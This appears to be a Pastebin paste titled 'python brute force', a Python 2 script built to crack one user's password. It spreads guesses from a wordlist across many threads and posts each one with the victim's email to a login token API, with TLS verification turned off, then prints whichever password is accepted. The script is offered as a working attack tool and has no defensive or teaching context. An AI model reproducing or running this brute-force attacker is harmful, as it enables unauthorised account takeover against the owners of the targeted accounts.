API tools faq
paste
Advertisement
iscomsa

python brute force

iscomsa
Dec 26th, 2018
901
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.84 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # sudo apt-get update && sudo apt-get upgrade && sudo apt-get install python-pip && sudo pip install requests --upgrade && sudo apt-get install htop && sudo apt-get install nethogs && sudo reboot
  3.  
  4. import requests
  5. from time import sleep
  6. import time
  7. import re
  8. import json
  9. import hmac
  10. import hashlib
  11. import binascii
  12. import sys
  13. import os
  14. import threading
  15. import Queue
  16. import socket
  17. import string
  18. import random
  19.  
  20. requests.packages.urllib3.disable_warnings()
  21.  
  22. class WorkerThread(threading.Thread):
  23.  
  24. def __init__(self, queue, tid, workers, user, debug) :
  25. threading.Thread.__init__(self)
  26. self.queue = queue
  27. self.tid = tid
  28. self.user = user
  29. self.debug = debug
  30.  
  31. def run(self):
  32. while True:
  33. try :
  34. password = self.queue.get(timeout=1)
  35. except Queue.Empty :
  36. return
  37. while True:
  38. r = requests.post("https://login/api/v1/tokens", headers={"Content-type":"application/json"}, data=json.dumps({"email":victimusername,"password":password,"client_id":u"xxxxxxxxxxxxxx\u003d\u003d","client_secret":u"m/LU/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+\u003d\u003d"}), verify=False)
  39. # correct pw
  40. if r.status_code == 200:
  41. print "[SUCCESS] Found the right password: " + password
  42. exit(0)
  43. elif r.status_code == 401:
  44. if self.debug:
  45. print "[FAILURE] Wrong password guess: " + password
  46. else:
  47. print "DONT KNOW"
  48. print r.text
  49.  
  50. break
  51.  
  52. self.queue.task_done()
  53.  
  54. if len(sys.argv) < 4:
  55. print "[INFO] Usage: python " + sys.argv[0] + " <USERNAME> <PASSWORD_DICTIONARY_FILENAME> <THREADS> [DEBUG]"
  56. exit(0);
  57.  
  58. debug = False
  59. victimusername = sys.argv[1]
  60. dictionaryname = sys.argv[2]
  61. workers = int(sys.argv[3])
  62. if len(sys.argv) > 4:
  63. debug = True
  64.  
  65. print "[INFO] Creating " + str(workers) + " worker threads..."
  66. start = time.time()
  67. queue = Queue.Queue()
  68. threads = []
  69. for i in range(0, workers) : # Number of threads
  70. worker = WorkerThread(queue, i, workers, victimusername, debug)
  71. worker.setDaemon(True)
  72. worker.start()
  73. threads.append(worker)
  74.  
  75. passwordList = open(dictionaryname,'r').read().splitlines()
  76. total = len(passwordList)
  77.  
  78. print "[INFO] Total # passwords: " + str(total)
  79. print "[INFO] Total # threads: " + str(workers)
  80.  
  81. for password in passwordList :
  82. queue.put(password.strip()) # Push passwords onto queue
  83.  
  84. while any(i.is_alive() for i in threads):
  85. time.sleep(5)
  86. current = total - queue.qsize()
  87. seconds = (int)(time.time() - start)
  88.  
  89. if current == total:
  90. for x in threads:
  91. x.join()
  92.  
  93. percent = (current / float(total))
  94. speed = current / float(seconds)
  95. bar = ('=' * int(percent * 20))
  96. perc = int(percent * 100)
  97. sys.stdout.write("%.2f pw/s [%s] %s%% (%s/%s)\n" % (speed, bar, perc,current,total))
  98. sys.stdout.flush()
  99.  
  100. print "[End] Total time: " + str((int)(time.time() - start)) + " seconds"
  101. sleep(10)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!